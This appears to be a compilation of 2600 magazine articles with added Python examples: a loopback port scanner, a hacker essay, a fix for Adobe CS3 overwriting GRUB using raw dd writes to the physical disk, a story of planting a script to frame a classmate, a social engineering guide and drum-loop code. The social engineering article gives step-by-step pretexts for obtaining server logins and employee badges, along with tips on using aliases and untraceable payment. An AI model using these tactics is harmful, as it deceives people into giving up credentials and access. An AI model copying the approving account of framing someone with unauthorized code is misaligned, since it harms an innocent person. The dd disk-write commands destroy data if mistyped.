The code within the for statement is a basic socket connection, and can be used in any client programming project. For example, one could use the code to connect to a web server and then stream in a URL request. Socket programming is a key element of remote access. An understanding of it can lead to writing servers and clients for one’s own needs. It facilitates the writing of clients and servers like mail, HTTP, backdoors, Trojans, and anything else that requires a connection between two computers.
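As an added example (not the article's Java and not part of the original), the same full-connect scan in Python, written so that the two caveats above are visible: a timeout is reported separately from a refused connection instead of being lumped in as "closed", and the listener, which the example starts itself on 127.0.0.1 so it runs offline, sees the scanner's connection the way a logging service would. All hosts and ports here are constructed for the demo.

```python
import socket
from typing import Dict, List, Tuple


def probe_port(ip: str, port: int, timeout: float = 0.5) -> str:
    """Attempt a TCP connection and classify the outcome.

    'open'     : the handshake completed, so something is listening.
    'closed'   : the host answered with a reset (nothing listening).
    'filtered' : no answer before the timeout. The article's scanner would
                 report this as 'closed'; keeping it separate is what avoids
                 the false negative on a busy or firewalled port.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((ip, port))
            return "open"
        except ConnectionRefusedError:
            return "closed"
        except socket.timeout:
            return "filtered"
        except OSError:
            return "error"  # unroutable host, permission problem, etc.


def scan(ip: str, ports: List[int], timeout: float = 0.5) -> Dict[str, List[int]]:
    """Probe each port in turn, grouping the results by outcome."""
    results: Dict[str, List[int]] = {"open": [], "closed": [], "filtered": [], "error": []}
    for port in ports:
        results[probe_port(ip, port, timeout)].append(port)
    return results


def start_listener() -> Tuple[socket.socket, int]:
    """Open a listening socket on an ephemeral loopback port: the 'service'."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    return srv, srv.getsockname()[1]


def pick_closed_port() -> int:
    """Bind and immediately release a port, so we know one that nothing is
    listening on (the listener above still holds its own port, so the kernel
    cannot hand out the same number)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def demo() -> Dict[str, object]:
    """Scan one open and one closed loopback port, then show the other caveat:
    the listener sees the scanner's completed connection, which is exactly
    what a real service would write to its log."""
    srv, open_port = start_listener()
    try:
        closed_port = pick_closed_port()
        results = scan("127.0.0.1", [open_port, closed_port])
        # The completed handshake is waiting in the listener's accept queue.
        srv.settimeout(1.0)
        conn, peer = srv.accept()
        conn.close()
        return {
            "open": results["open"],
            "closed": results["closed"],
            "filtered": results["filtered"],
            "seen_by_service": peer[0] == "127.0.0.1",
        }
    finally:
        srv.close()


if __name__ == "__main__":
    print(demo())
```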


Hacker Perspective
Annalee Newitz
Crime and Freedom
A few months after I turned fifteen, my friend Dave told me his summer school driver’s ed class was going to show Red Asphalt, this legendary movie where supposedly you could see people ground into paste after really bad car crashes. “You should sneak in with me and check it out!” he suggested. I was pretty enthusiastic about blood and guts, so this seemed like a sensible idea. Unfortunately, the movie did not deliver: There were no beheadings at all. So I spent my afternoon in the back of an air-conditioned classroom watching the cops on the disappointingly bloodless screen talk about bad, lawbreaking teenagers - and listening to Dave’s friends talk about their computers. It was the mid-1980s, and they were obsessed with cracking Apple software and getting access to The Pig Sty, the most elite BBS in our area. I’d played around with my own computer, a Kaypro 2 running CP/M, but hadn’t realized there was a whole community of kids doing the same thing. I had found my people. I spent the rest of the summer hanging out with those guys, and when school started again we met on a multi-user chat BBS called WizNet. As I learned more about computers, I realized that the people who loved them weren’t just united by a desire to understand networks and assembly. We wanted to find out how complicated things worked - especially things designed to thwart our exploration with obfuscation or outright bullshit. And for many of us, that exploration started with machines and radiated outward to touch everything in our lives. My formative years were spent in the churchy suburbs of Orange County, California, during the Reagan Era. Until I started hanging out with computer hackers, adulthood had been explained to me mostly by fashion magazines and my peers. Apparently it would involve manicures, dying my hair blonde, wearing dresses, and waiting by the phone for boys to “ask me out.” In short, conformity to a repugnant ideal. 
And yet, I found no alternative models for my future except in science fiction - which was, of course, an impractical template for adulthood unless I expected shortly to mutate or go into space. It was among computer hackers that I began learning about a rogue form of adulthood that defied my community’s expectations, and that was also possible in the real world. Well, it was possible if you didn’t get caught. A year before I joined the computer scene, a bunch of guys my friends knew had gotten arrested for breaking into computers - I can’t remember now whether they’d popped some school computers, government computers, or both. Mostly what I recall is a vivid story my friend Jeff told about seeing the guys’ computers being carted off by federal agents while their parents stood by in open-mouthed rage. This had the effect of wedding forever in my mind the struggle to explore freely and the danger of being branded a criminal. My friends considered it a great accomplishment to crack the copy protection on programs so you could share them with everybody; and we spent many lazy Sunday afternoons wardialing and phreaking our way into free long-distance calls. If this was crime, I decided, then the law was obviously bullshit. And if computer crime laws were bullshit, who knew what other rules were bullshit? Once I’d asked that question, I stopped wearing pink, took on an alias, and made sure my mom never had to buy another copy of Mac Paint again. I also stopped giving a crap about all those unwritten rules on how girls are supposed to act. I wore men’s ties and read pornography. I had a bunch of fantastically nerdy boyfriends, and

I didn’t care who knew about it. The girls in school called me a slut, which I classified as yet another one of those so-called crimes that was actually no crime at all. I started writing stories about heroic outlaw hackers and reading books about counterculture and sex. It was around this time that I decided my goal in life was to escape Orange County and live in San Francisco. Up there, people were fucking anybody they wanted, all the time. Plus, they were making bizarre, amazing art and committing crimes way too awesome for a high school student to find out about. At least, that’s what I assumed, based on the books I’d read. At last, I had a concrete notion of what I wanted to do as an adult. These formative experiences left me with a definition of hacking that might seem surprisingly broad to people who think hackers are highly-technical people who tinker solely with computers and possibly a few other machines. I think of hacking as any rational and concerted effort to explore a complex system and then customize it as you wish. Only that definition explains why my familiarity with BBS systems inspired me to re-imagine, among other things, my gender identity and ethical life. A lot of people struggle their whole lives to live up to the ideal of what it means to be male or female, and live in misery because they can’t. Men are told they have to be strong and aggressive; women, that they should be attractive and emotional. There are hundreds of other such stereotypes, up to and including the one that says men are good at science and women aren’t. And all of them are bullshit. They’re like the glue that game companies used to pour over the chipsets in video games to prevent people from reverse-engineering them. All they do is cover over a basic and discoverable truth, which is that gender is just a set of commands that your body can execute in all kinds of ways that have nothing to do with what the instruction manual tells you. 
I became a gender hacker because I couldn’t act like a “girl” even when I wanted to. I could have become a man, but I didn’t want that either. Instead I committed myself to tinkering with my identity to reflect who I am and how I want to be seen, which is as a person who doesn’t fit into any known gender category. Partly, this has meant customizing my body. I have short hair and usually wear men’s clothes, though I love wearing vintage dresses and skirts sometimes. I also used surgery to correct the one thing I hated about living in a female body: the possibility of getting pregnant. I got a tubal ligation when I was in my twenties, and ever since then my reproductive system has behaved exactly the way I want it to. Once you start hacking your gender, a lot of other fundamental rules become fungible too. For example, most people think that family means getting married and having babies. Since I had successfully eliminated the whole baby-making problem, I wondered if there were other things about family life that I could reconfigure too. I dated people of different genders, dated several people at the same time, engaged in serial monogamy, went to a lot of great orgies, and was even celibate for a couple of years. I knew I didn’t want an off-the-shelf relationship, and eventually I figured out a configuration that works well for me. And yes, it’s the sort of setup that many people would consider a crime against nature and various gods. Hackers learn at an early age to question what their communities define as “right” and “wrong.” It’s not that we don’t believe in truth and justice - it’s just that we’d like to figure out for ourselves what those things are instead of adopting definitions supplied by teachers, governments, and corporations. People who hack, who question conventional wisdom, are called crazy; but when they inspire other people to ask questions they are called subversives. Looked at another way, subversion is a form of sharing. 
And I’ve always found that computer networks are an excellent way to share. All of my very best acts of subversion would not have been possible without computers. In the 1990s I co-founded Bad Subjects, a publication devoted to radical politics and pop culture, which most people read on gopher and then, later, on the web. That experience was as transformative to me as an adult as meeting those computer hackers was when I was a kid. I found a community of people online who were writing about how capitalism and other social institutions molded our lives and confined us. I became aware of the political choices I was making every day. I realized that even my ability to become “aware of political choices” was partly a result of having enough money to get a college education, buy a computer, and chat on mailing lists with other people who had the leisure time to join me. I went from tinkering with my personal gender identity to forming connections with people who wanted to tinker with the vast fabric of society and history.

And so that’s why, in writing for publications from Wired to my blog io9.com, I have tried to inspire people to hack, subvert, and reconfigure. I hope that they’ll start with computers and networks, and not stop there. I want people to understand that we can ruthlessly hack everything that exists, from our religions to our economic systems. Of course, it’s one thing to upgrade your machine from a proprietary OS to a free one, and quite another to upgrade your civilization. Still, it’s important to know what you’d like your society to be like when it grows up. What today people call crimes, the future will know in retrospect as the first stirrings of liberation.

Annalee Newitz is the editor-in-chief of “io9.com,” a blog about science and science fiction. She has contributed to “Wired,” “New Scientist,” and the “Washington Post,” and is the co-editor of “She’s Such a Geek” (Seal Press).

Hacker Perspective is a regular column featuring the views of various luminaries known to the hacker community and oftentimes the mainstream as well. In the past, we’ve featured commentaries from:
The Cheshire Catalyst, Bruce Schneier, Phiber Optik, Bill Squire, Virgil Griffith, Jason Scott, Bre Pettis, Mitch Altman, Rop Gonggrijp, Barry Wels, Nick Farr, Johannes Grenzfurthner
We want this list to grow even bigger. Is there a person you’re aware of who is a known entity and has made a noteworthy accomplishment of some sort that would be recognized by the hacker community? Do you feel this individual would have something of interest to say about what it means to be a hacker? If so, then let us know and we will try to entice them into writing the next Hacker Perspective! Email us at articles@2600.com with details.

twitter.com/2600
Yes, we can't believe we're saying it either, but this could be a real good way to stay in touch during important hacker events. We won't send you a lot of useless crap, just the important stuff.

Hey Adobe! Leave my Boot Loader Alone!
by dolst (dolst.com)

I will begin with the usual semi-legalese about this article being for instructional purposes only, and not to steal software because it is wrong/bad/illegal/immoral/unpatriotic/etc. Doing anything listed in this article could render your computer a doorstop, and you could lose all your data if you don’t know what you are doing. The methods described in this article also require a rudimentary understanding of the dd program, and the knowledge that you can nuke your system should you commit a typo during its use. This article applies to dual-boot Linux systems using GRUB and a boot partition, which is fairly common. All bets are off for any other configuration. (If you are using LILO and are affected by the following symptoms, sorry, I cannot help you.) With that said, let us begin.

One day, my friend brought his laptop to me with a problem. He had installed XP and Ubuntu in a dual-boot configuration with GRUB, Linux’s boot loader. His partition scheme was like this: 200MB ext3 boot partition, NTFS XP partition, ext3 Ubuntu partition, a FAT32 partition, and another NTFS partition, plus an extended partition where he kept the swap. Everything was working. He could choose between XP and Ubuntu at boot with no problem. Then, he decided to install Adobe CS3, with Dreamweaver, Premier, and Acrobat Professional. CS3 had a valid serial number, and was activated. He ran the Adobe updates, and then everything was hunky-dorey. Everything seemed cool until he restarted the computer. During boot, he saw the typical POST screen, then the GRUB message, then “GRUB Loading Stage 1.5”, followed by the boot menu. Then the screen went blank. Then he got the POST screen again. This continued ad infinitum until he powered off the laptop.

My friend was sure that installing CS3 was the cause, as it was the last change made before the problem occurred. He assured me he had not altered CS3’s files in any way (nor would he have known how). I whipped out my trusty Ubuntu CD, and booted into live mode. I ran parted and saw all the partitions there, just as he had described them. Everything seemed to be intact. So, I used the Ubuntu CD to reinstall GRUB. I ran GRUB from the live CD and told it to find stage1, which it found at hd0,1. I did the usual root(hd0,1), setup(hd0), and it said it had installed all 16 sectors and everything was okay. Problem solved! I was sure that whatever had b0rked his boot area couldn’t have been Adobe CS3... could it? I rebooted the machine and GRUB came up... then XP with no problems! Win! Everything was cool, so I restarted for good measure, again. GRUB still played nice.

My friend suggested that I run Photoshop. I did so, then restarted the computer. BAM! GRUB once again got stuck in a loop! Again, I used the Ubuntu CD to reinstall GRUB. A few more times, a few more tests, all lead to the same conclusion: Adobe software was boogering GRUB somehow! Why would any Adobe program need to write data to the boot area? It was Google time! I did a search for “photoshop” and “grub”, which yielded an Ubuntu Forum archive from November, 2007. In it, several people seemed to have the same symptoms, with dual boot systems. Some assumed it was Vista-related. Another search turned up a page from 2004. It seems CS2 was doing something similar to dual boot systems! Searches about Adobe and the master boot record produced a page that mentioned Adobe CS3 writes its serial number to the MBR. This turned out not to be technically accurate, but it did put me on the right track.

The Master Boot Record lives in the first 512 bytes of your computer’s hard disk. It contains the partition table and the executable code needed to make the computer give you more than a blank stare. After that first sector, before the first partition, there are usually a good 63 sectors or so that are used for executable boot code. For this article, I will call this the boot area. For single-boot Windows systems, a good chunk of this boot area is unused. However, if you are dual-booting with Windows and most any modern Linux distro, this area is used in part by GRUB.

In the interest of preventing piracy, Adobe determined it was okay to write that serial number to its users’ boot area, despite already requiring a serial number and activation. On most Windows systems, this seems to have no adverse effect. But this obviously did not apply to my friend’s XP installation. For those of us who use GRUB to boot into multiple OSes, Adobe’s “protection” stomps all over a vital portion of the hard drive, making the computer unbootable. Furthermore, this is not done solely at install. Running any CS3 software, including Photoshop, Dreamweaver, Illustrator, or Premier, results in a check of this area of the hard drive. If you have repaired it in the interest of simply booting your computer, CS3 happily “fixes” it for you, once again rendering your machine unbootable! Sure, you can boot with an Ubuntu live CD after every use of CS3, but this gets tiresome. Some say they have mentioned this to Adobe, whose response is allegedly that “it affects so few people” as to be unworthy of their attention. Apparently Adobe does not care about this, even if you have paid Adobe real money for their software. So I decided that if Joe User couldn’t prevent Adobe from mucking up his boot loader, he should at least have the option to reverse it every time it happens.

First, I had to determine which part of the boot area was being affected. After reinstalling GRUB, I booted the live CD, and copied the beginning of the drive to a file on its FAT32 partition. Initially, I only copied the first 512 bytes (aka the MBR itself). I went ahead and booted back into XP, ran CS3, then rebooted with the Ubuntu CD and repeated the whole dd process. I copied that same sector to another file. The two files had identical MD5 checksums, so the actual MBR was not altered. However, a hard drive sector is 512 bytes (the size of the MBR) and I remembered GRUB’s “16 sectors” message. This time I changed dd’s block count to 16. I booted into Windows, again, and after letting CS3 have its way, repeated the dd, and the MD5 sums were different. This meant the change was somewhere in those 16 sectors. So, I looked at the two different 8K files in a hex editor. I’m no hex-editing guru, but based on the evidence, it was clear some essential part of GRUB got wiped. Comparing the clean GRUB image to the molested version showed both were identical before block 0x1400 (5120 decimal) and after 0x1600 (5632 decimal).

What now? We need a method to substitute the clean boot area for the fiddled-with boot area. Now, this is where dd for Windows comes in. Windows refers to block devices and file systems differently than Linux. Still, the principal is the same, and the Windows version of dd is just as powerful (and dangerous in unskilled or malicious hands). “\\.\PhysicalDrive0” is the Windows equivalent of /dev/sda. With dd, I created a clean image of the first 8K of the physical hard drive, like so:

dd if=\\.\PhysicalDrive0 of=c:\unfiddle\clean.img bs=1024 count=8

This creates a snapshot of the clean boot area in c:\unfiddle\clean.img. The larger block size of “bs=1024 count=8” yields better performance than the mathematically identical “bs=512 count=16”. Next, I created a batch file that would write this clean 8K image to the first 16 sectors of the hard drive. Then, I copied dd.exe into a default Windows path so it could be called from the command line as I pleased. The resulting command looks like this:

dd if=c:\unfiddle\clean.img of=\\.\PhysicalDrive0 bs=1024 count=8

This command writes the contents of “clean.img” to the first 16 sectors of the drive. You must be absolutely sure you have exactly the right file, or you WILL render your computer unbootable, possibly beyond GRUB’s help. (The Ubuntu live CD has options for reconstructing partition tables, but you don’t want to have to go there!) I put the above command into a file called “c:\unfiddle\unfiddle.bat”, then created a shortcut to it on the desktop. Thus, we have a way to fix our boot area.

Meanwhile, manually running unfiddle.bat every time we use CS3 would be tedious. I needed to make sure this happened automatically, when we run an Adobe application. So, I came up with this version of unfiddle.bat:

start "dummy" "%~f1"
ping -n 30 127.0.0.1
dd if=c:\unfiddle\clean.img of=\\.\PhysicalDrive0 bs=1024 count=8

The batch file is called with the path to the desired Adobe program following it. For example:

C:\unfiddle\unfiddle.bat "C:\Program Files\Adobe\Adobe Photoshop CS3\Photoshop.exe"

“start” loads whatever program is listed during the calling of unfiddle.bat itself. The “dummy” is needed because of a quirk that requires the first parameter of start in quotes to be the title of any new command window that may be opened in the process. The “%~f1” is the full path to the Adobe (or, theoretically, any other) program we want to run. The next thing I have it do is ping 127.0.0.1 (localhost) thirty times. This is just a way for it to bide its time. Meanwhile, this program begins loading. While unfiddle runs, Photoshop, Dreamweaver, or whatever, is loading, initializing, starting, and fiddling with the boot area. Meanwhile, unfiddle.bat is still executing. Then, the program finishes loading, and is ready to use. A few seconds after this finishes, unfiddle.bat finishes pinging and then runs dd to *un*fiddle the boot area! Use the program, edit photos, create a web page, make a music video, or whatever. When you’re done, you can still reboot your computer and have it do what it is supposed to. If 30 pings are not enough to keep unfiddle busy while CS3 is still loading, you can increase the count to 40, 50, or even 100.

Take a few minutes to go through and edit all your Adobe shortcuts in the start menu to reflect this change. Right-click the shortcut, and in the “target” section, just paste c:\unfiddle\unfiddle.bat in front of the existing target name, which should already be in quotes. When you’re done, it should look like the example above. Next, go to “change icon”, then re-select the same icon it’s already using. This step may seem redundant, but if you don’t do it, it “forgets” where the icon is. Then you’ll have to track down the icon’s EXE file. A few shortcuts may be “unadvertised links”, which means you can’t change their target, but you can delete them and replace them with manually-created shortcuts to their respective EXEs. Then you can alter their targets just like any others.

In a sunshine-and-lollipop fairytale world, this would be all you have to do to be free of Adobe’s fiddling. Unfortunately, there are still scenarios in which these nefarious applications may execute without your consent, and run roughshod over your boot area. Doubleclicking a Photoshop file to open it, having Adobe Update run spontaneously, or even viewing an online PDF in your browser can jeopardize your boot area. (Fortunately, the free Adobe PDF Reader is safe, if you do not have CS3.) For this occasion, I kept the original version of unfiddle.bat and named it uflite.bat. All it does is the dd copy, nothing more, nothing less. Using the Windows Group Policy Editor, I added uflite.bat to the shutdown scripts, which makes it run at shutdown and restart. I left a shortcut to uflite.bat on the desktop for periodic use in the case of hibernation (which does not run shutdown scripts) and/or accidental powering off without shutdown. In these cases, if uflite is not run and the boot area has been fiddled with, you will need to use a bootable CD of some type (Ubuntu, Trinity Rescue, BartPE, etc) to restore the boot area from your clean image file.

Another quick note should be made here. Adobe CS3 seems to like to communicate with 192.168.112.2o7.net. (Notice the letter “O”, not the number zero in that last “octet”.) At first glance, this looks like an internal IP address. In fact, it is a subdomain of 2o7.net, which is owned by Omiture. Feel free to 127.0.0.1 it out in your hosts file, if you care. One final amusing tidbit: the licensing software Adobe uses is FLEXnet, which is also used by Autodesk 3DS Max and other programs. It was created by Macrovision, perpetrator of the early commercial video copy-protection schemes. Those of us old enough to remember VCRs can now be heard groaning at the mention of that name.

The ramifications of software piracy are a discussion for another day. That subject is beyond the scope of this article. However, the unintended consequences of Adobe’s anti-piracy methods, and their effect on legitimate users, in this case, make the “cure” as bad as the disease. I hope Adobe will adopt a less destructive method for protecting their intellectual property. Until then, this workaround will suffice. The choice is yours. Happy unfiddling and, as always, surf wisely! Obligatory shoutouts to Foxfire and Warmech.

Links
Windows DD: http://www.chrysocome.net/dd
XVI32 Hex Editor: http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm
Ubuntu forum where question was first asked about Adobe and MBR, Nov 2007: http://ubuntuforums.org/showthread.php?t=603435
Velocity Reviews thread from 2004, about CS2: http://www.velocityreviews.com/forums/t251090-photoshop-cs-on-dual-boot-linuxwinxp-systems.html
First lead on link to Adobe “writing to the MBR”: http://www.centernetworks.com/adobe-replies-to-spy-concerns
First mention of Macrovision involvement: http://www.fixya.com/support/t800405-adobe_cs3_macrovision_drm_residue
Explains how Windows boot area is mostly zeroed out: http://www.geocities.com/thestarman3/asm/mbr/NTFSBR.htm
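An added example, not the article's batch file or anything from its author: the comparison step done in Python rather than by eye in a hex editor. Given a clean 16-sector snapshot and a later capture (the article's clean.img and its fiddled-with counterpart), it reports the differing byte ranges and the sector numbers they fall in, and says whether the MBR itself (sector 0) changed. The two images are constructed in memory so the check runs offline; read_boot_area() shows how the same bytes would be pulled from a file or device path.

```python
import hashlib
import random
from typing import Dict, List, Tuple

SECTOR = 512              # a hard drive sector, the size of the MBR
BOOT_AREA = 16 * SECTOR   # the 16 sectors GRUB reports installing (8K)


def read_boot_area(path: str, length: int = BOOT_AREA) -> bytes:
    """Read the first `length` bytes of a file or block device: the same bytes
    the article's dd snapshot copies into clean.img. Not used by the demo,
    which builds its images in memory instead."""
    with open(path, "rb") as f:
        data = f.read(length)
    if len(data) != length:
        raise ValueError(f"{path}: expected {length} bytes, got {len(data)}")
    return data


def md5_hex(data: bytes) -> str:
    """The MD5 comparison the article used on its two captures."""
    return hashlib.md5(data).hexdigest()


def diff_ranges(clean: bytes, current: bytes) -> List[Tuple[int, int]]:
    """Return [start, end) byte ranges where the two images differ.

    This finds the article's 'identical before 0x1400 and after 0x1600'
    directly instead of by scrolling through a hex editor.
    """
    if len(clean) != len(current):
        raise ValueError("images must be the same length")
    ranges: List[Tuple[int, int]] = []
    start = None
    for i, (a, b) in enumerate(zip(clean, current)):
        if a != b and start is None:
            start = i
        elif a == b and start is not None:
            ranges.append((start, i))
            start = None
    if start is not None:
        ranges.append((start, len(clean)))
    return ranges


def affected_sectors(ranges: List[Tuple[int, int]]) -> List[int]:
    """Map byte ranges to the sector numbers they touch. Sector 0 is the MBR;
    a result without it matches the article's finding that the MBR itself
    was untouched while a later GRUB sector was not."""
    sectors = set()
    for start, end in ranges:
        sectors.update(range(start // SECTOR, (end - 1) // SECTOR + 1))
    return sorted(sectors)


def check_boot_area(clean: bytes, current: bytes) -> Dict[str, object]:
    """Summarise whether the boot area still matches the clean snapshot."""
    ranges = diff_ranges(clean, current)
    return {
        "intact": md5_hex(clean) == md5_hex(current),
        "mbr_changed": any(start < SECTOR for start, _ in ranges),
        "ranges": ranges,
        "sectors": affected_sectors(ranges),
    }


def build_sample_images() -> Tuple[bytes, bytes]:
    """Constructed data: a pseudo-random 'clean' boot area and a copy whose
    bytes 0x1400..0x1600 have been overwritten, mirroring the span the
    article observed. XOR with 0xFF guarantees every byte in the span differs."""
    rng = random.Random(2600)
    clean = bytes(rng.randrange(256) for _ in range(BOOT_AREA))
    fiddled = bytearray(clean)
    for i in range(0x1400, 0x1600):
        fiddled[i] = clean[i] ^ 0xFF
    return clean, bytes(fiddled)


if __name__ == "__main__":
    clean_img, fiddled_img = build_sample_images()
    print(check_boot_area(clean_img, fiddled_img))
```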

Revenge Is a Dish Best Served Cold
by Valnour

I had a bully in my freshman year of high school. He wasn’t much of a bully, though. He did have about 60 pounds on me, being a few inches shorter than me, but that was about it. He wasn’t so much a bully as a horribly annoying experiment in verbal abuse. He’s the kind that was on the fast track to an MCSE, and after seeing some of the books I would bring to class (Learning Perl, The Art of Intrusion, Hacking: The Art of Exploitation) he started to tell me about the “exploits” he and his “gang” had discovered. He said that he and his gang of hackers had stolen credit card numbers, broken into ATM machines, and had even gotten into the school’s network on multiple occasions. This guy was a real lamer. He was a script-kiddie at best, and all of the exploits that he had apparently “discovered” had been patched years ago. This guy couldn’t type, couldn’t read, could barely talk, and had never heard of Linux, *BSD, or any other OS besides Windows. The bully of mine was a real loser.

At the time, I first began reading 2600 and other hacker publications, and had been using Linux at home exclusively for about 2 years. I was beginning to identify with the hacker world, but very much considered myself a padawan without a master. I was a big nerd on top of all of this.

This was in a keyboarding class, in a computer lab with about 30 computers. All of these computers were running Windows 2000 (or possibly XP). Every computer in the lab had the hostname and IP address of that particular computer printed on a label that was placed on the back of the computer just above the power supply. The IP was something like “10.0.2.25” and the hostname was “LAB-10-0-2-25”. This uniquely identified the lab number (2) and computer (25) associated with each IP. Also, each computer had a wide open share that allowed the student to exchange documents with the teacher. This share was also readable and writable by every student in the class on every other student’s computer. I’m not sure what the purpose of that was, but it was probably unintentional.

I was also taking a class entitled “Cisco Networking” with a friend of mine who was a big Windows nerd, and he was also the only student in school that I could semi-relate to about computers. He had shown me the “net send” command. To those unfamiliar to Windows, this command makes a dialog box appear on a computer in your network, along with a message. Apparently the system administrator at our school had never seen this command, and had accidentally sent a blank message to every machine in the school. Being a trusted student, he did not get in trouble for this, and was actually rewarded for discovering this ability.

Then the bully began to harass me via “net send,” and this was just too much. I had to do something to this kid to get him off my back. I had to take some sort of action. Being unfamiliar with Windows, I did not know if it was possible to execute the script from another machine, and have the message reflect as though it came from his machine. I wrote a small script that would send a message to every machine in the school that said “ALL YOUR BASE ARE BELONG TO US!!!! MR. (name of system admin) SUCKS!!!” and would then delete itself. I read it a couple of times, but was unable to test if the script worked. The next day I got to class early. I accessed his network share, and uploaded the script. So I logged onto his computer before he got there and scheduled the script to run 30 minutes later. I then walked back to my seat and logged on. A few minutes after the instructor’s lesson started, a message popped up on my screen. It was from the bully’s IP, and it contained my message. I looked around and it was on the monitor of every other machine in the class as well. A moment later, the system administrator and principal came storming into the door. They checked the IP of every machine, and discovered who the culprit was. They hauled off the bully and gave him a week’s suspension. Justice was served.

One day, I entered my keyboarding class and was greeted by the teacher and a new seating arrangement. I would no longer have to sit by the lamer, and could catch up on my reading after my keyboarding lessons were completed. Awesome. I am sure many of you can identify with me at that age and, looking back, my revenge on this poor sap was immature and unnecessary, but it was so much fun.

Social Engineering
From A New Perspective
by Lilith

After being in the scene since the early 90s, I have become quite aware that fellow female hackers are a rare breed. Whether it's lack of acceptance within the technical community or lack of interest is enough to write another text file in and of itself. That said, it's really lame that some of the easiest things for chix to do haven't been passed on to the boys. Certain hax0r suppa-stars can write books upon books on social engineering but, that may work for men and those who refuse to let their egos down for a second and work in reverse. There is a large perception that social engineering is based on knowledge and proof of presence. Yeah, if you can out-tech and seem professional, you will go far. The problem is, in order for something to be done right, one must really have a fucking clue as to what they are doing. Let me break it down: what the goal is, and how to get the positive result from the variable of an ending.

And let it be well known it's not all about sexuality so much as manipulation. This doesn't have much to do with using sexuality to get your way. Again, the fact is, we have been trained from birth to social engineer. This is something women do with each other, not usually for malicious purposes, but as a way of communicating. Women already know how to do this and it won't work with guys doing it to guys. Instead of me trying to write it out in some dimestore psycho babble, let me give you some great examples of what I mean, and we can try and make them apply to the estrogen challenged:

1) "Lisa" needs access to a company's server. She needs a login and password. The first thing she does is search the company website to see if she can find the list of employees in the IT department. She chooses one, or if she can't find one, she makes a few phone calls trying to figure out who the person she needs to talk to is. She also chooses a department she is working in and finds out the manager's name. "Lisa" calls IT guy, asking for assistance, and frantically explains that she is a temp. She is sick with the flu but her boss told her she can work from home. The problem is, the information on how to access the server was wrong, and she doesn't want to ask her boss to repeat herself for fear of getting fired. She needs this job! Now, here's where you have to dumb it down. You know nothing! You are a complete twit. Men love to feel superior, it makes them feel better. Use this to your advantage.

2) Need something physical? Let's say you want to make an employee badge. "Lisa" goes to the company and asks to speak to someone in the HR department. "Lisa" reveals that her son/brother is doing a student film at school and needs an ID badge as a prop. You called earlier and talked to someone who said that it would be no problem to come down and get a sample badge (deactivated, of course). Sound crazy? I've done it... it works. They aren't looking for this sort of security violation. Who's going to make this kid cry or get a bad grade? This will work on most women HR people. You are a parent/sibling. You are helping this kid out. You PROMISED you would get one for him. Film props, school projects and plays are all good excuses. It also gives you a solid base for your lie. This has actually worked coming from a government office.

3) "The OMG, so do I!" The best way to gain trust in someone is to play the very popular game of similarities. "Lisa" needs to get some information from someone. "Lisa" starts to lay out the groundwork. Women trust easier if they can associate with you on a personal level. In person (always advisable if you can) check out the personal workspace of your new friend. Do they have pictures of kids? Sports knick knacks? A fucking ivy plant? Well, so do you! Time for some personal chit chat. Women especially love it if you ask about their kids, what grade are they in? You know, your sibling/kid is that age too. Blah blah. Key things to have in common? Work issues, management sucks, and anything that makes you an average person. Once you have traded a few bits of personal information, you gain a little trust. People let their guard down fast. If you can help it, try and get the info you're scamming for at a later date. Get the person's card and shoot them an email. Lisa did this trick with a Raytheon HR employee. She didn't get the job she came in to get information on, but she now has an inside friend, which can take it to as many levels as she needs. Aww, Lisa, you con artist!

4) Pity. This works especially well with women. Be nice, be humble, be as sweet and naive as possible. If you are doing this over the phone, use the same tone of voice you use when you call your Nana. If you're anything like me, PRETEND.

5) This is in the "I didn't want to go there" department. One thing women love to help men with is relationship issues. Doing something under the guise of trying to help out your girlfriend is always cool. Women adore and trust men that do good things for their ladies. Make sure you mention it. No comment on how well that sort of thing works in my favor, but I have a close friend who screwed an operator at GTE for dialups and logins. Yeah, I know, could be worse ways to get information!

Toolkit

Your research: Always spend some time doing research on your mark. You will look like a fucking moron if you don't.

An alternate phone number: I recommend grandcentral.com. It's free and you can use it for incoming and outgoing calls. Skype is ok.

Borrowed WiFi: Nice to use, and maybe your neighbor doesn't mind (don't ask, don't tell).

I don't think I have to remind anyone here that all of these accounts should be established using alternative aliases and paid for with V/MC gift cards. If I have to explain to you what to do after you get it, you shouldn't be reading this article. All of this info is pretty base. Once again, just keep a few things in mind and you will be able to get any info out of anyone.

A Simple Technique For Drum 'N' Bass
by SigFLUP

Good hello. It's a pleasure to be addressing you all in this article. In this article, I will be describing a rather simple technique for "playing" drum 'n' bass, that I've "discovered." If you'd like to listen to this, you can download it at http://hobones.dogsoft.net/test_loop.mp3

Ok, now that you've listened to that, I'm going to describe this technique by embedding it into a program. Now this program is a sampler of sorts, a sample that loops. The loop is a drum loop that's 65535 samples (or multiples of 65535) in length. This is so that a 16-bit number is perfect in describing where the speaker is. In the mp3 above I use http://hobones.dogsoft.net/2600_beat.wav. Really anything that's drum 'n' bassy sounding works well; the Amen break works well. Let's call this 16-bit number pos. Now if you just increment pos and wrap it around 0xffff (65535) indefinitely, you get a very nice drum beat. Nice, but boring.

Let's store the keyboard modifiers in an array called mods, with Q as the least significant bit, so that mods[0] is Q: QWERTYUIASDFGHJK. The trick here is to imagine that the bits of pos are mapped to your keyboard. When you push bits, they get ORed together, the result being stored in both bits. For example, E held down with J: if E or J is 1 they both become 1. This little routine ought to do the trick:

    #define SET_BIT(x,y)  (x|(1<<y))
    #define TEST_BIT(x,y) ((x>>y)&1)

    int mods[18]; /* 1 while the key for that bit is held; mods[17] is the space bar */

    int mod_pos(int in) {
        int pool, i, out;
        out = in;
        pool = 0;
        /* Get half the input */
        for(i=0; i<16; i++)
            if(mods[i] == 1)
                if(TEST_BIT(out, i) == 1)
                    pool = 1;
        /* Compute and store where appropriate */
        for(i=0; i<16; i++)
            if(mods[i] == 1 && pool == 1)
                out = SET_BIT(out, i);
        return out;
    }

